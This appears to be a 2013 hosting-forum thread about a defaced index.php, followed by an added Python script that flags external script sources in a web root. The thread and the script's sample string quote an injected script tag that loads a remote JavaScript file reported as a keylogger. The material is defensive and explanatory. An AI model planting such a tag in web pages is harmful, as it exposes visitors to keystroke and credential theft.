habafflof Posted November 11, 2013

Good day. So recently I've been going through the files on my website and noticed that the "index.php" file hosted on my website seemed to be hacked. The contents of it start with: "<html><head><script src='http://adithya.googlecode.com/files/Apctrl%2Bu.js' type='text/javascript'></script><title>Hacked By @Lulz53c</title>"

I haven't noticed it for a while because I have "index.html" there too, so it was accessed before "index.php" and therefore the hack made no impact on the website. The file was last modified on 9/21/13 according to the FTP records, and while I'm not really concerned over my website, I thought that it might've affected other users of Helio Host. I'll attach the actual "index.php" for your reference.

index.php

lancersupraskyline Posted November 11, 2013

Well, from some light Googling, it appears that your site is not the first. The JS file was hosted at Google Code, which was already banned/removed, as of October 12. A user reported it to be a keylogger, and Mr. hacker here has a personal blog.

habafflof Posted November 11, 2013

The specific javascript wasn't hosted on my website because "index.html" took over "index.php", but should I still be concerned or is it only active while the "index.php" file is accessed?

lancersupraskyline Posted November 11, 2013

In my opinion, it is not a concern, because:

- Your index.html precedes index.php, so it only runs when a user types in <url>/index.php specifically.
- The JavaScript file has been removed from Google Code, which means the JavaScript won't load. I have tried accessing the JS file directly, and I got a 403 error. If you are still afraid, here's a link to what it looks like with an online screenshot.
- The whole index.php file does not seem to have any dangerous elements, except for the JS file. Only some psychedelic NyanCats with YouTube background music.
- There's a link at the bottom, which leads to a list of hacked websites (I think?), which shows the websites hacked by "Lulz53c", of which Mr. hacker here claims to be a member.

Of course, to be safe, clean up your index.php, or remove it totally if you don't need it.
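
Added example, not part of the original thread or any poster's code: one way to check a web root for the kind of change described above, by listing every `<script src>` that points at a host outside an allow-list, together with the file's last-modified date. The function names and the `SAMPLE` string are assumptions made for illustration; `SAMPLE` is constructed from the tag quoted in the first post.

```python
import os
import time
from html.parser import HTMLParser
from urllib.parse import urlparse

WEB_EXTS = (".php", ".html", ".htm")
# Constructed sample: the opening tag quoted in the first post, plus a local script.
SAMPLE = ("<html><head><script src='http://adithya.googlecode.com/files/Apctrl%2Bu.js' "
          "type='text/javascript'></script><script src='/js/site.js'></script>")

class _ScriptSrc(HTMLParser):
    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        # Record the src attribute of every <script> tag that has one.
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.srcs.append(src.strip())

def external_scripts(markup, allowed_hosts=()):
    """Return script URLs whose host is not in allowed_hosts.
    Relative URLs carry no host (same origin) and are skipped."""
    parser = _ScriptSrc()
    parser.feed(markup)
    parser.close()
    allowed = {h.lower() for h in allowed_hosts}
    return [s for s in parser.srcs
            if (urlparse(s).hostname or "").lower() not in allowed | {""}]

def scan_webroot(root, allowed_hosts=()):
    """Walk root; return (path, last-modified date, script URL) per finding."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(WEB_EXTS):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                markup = fh.read()
            mtime = time.strftime("%Y-%m-%d", time.localtime(os.path.getmtime(path)))
            for url in external_scripts(markup, allowed_hosts):
                findings.append((path, mtime, url))
    return findings

if __name__ == "__main__":
    for finding in scan_webroot("."):
        print(*finding, sep="\t")
```

Files that are shadowed by another index document, like the `index.php` in this thread, are still scanned because the walk does not depend on what the web server serves by default.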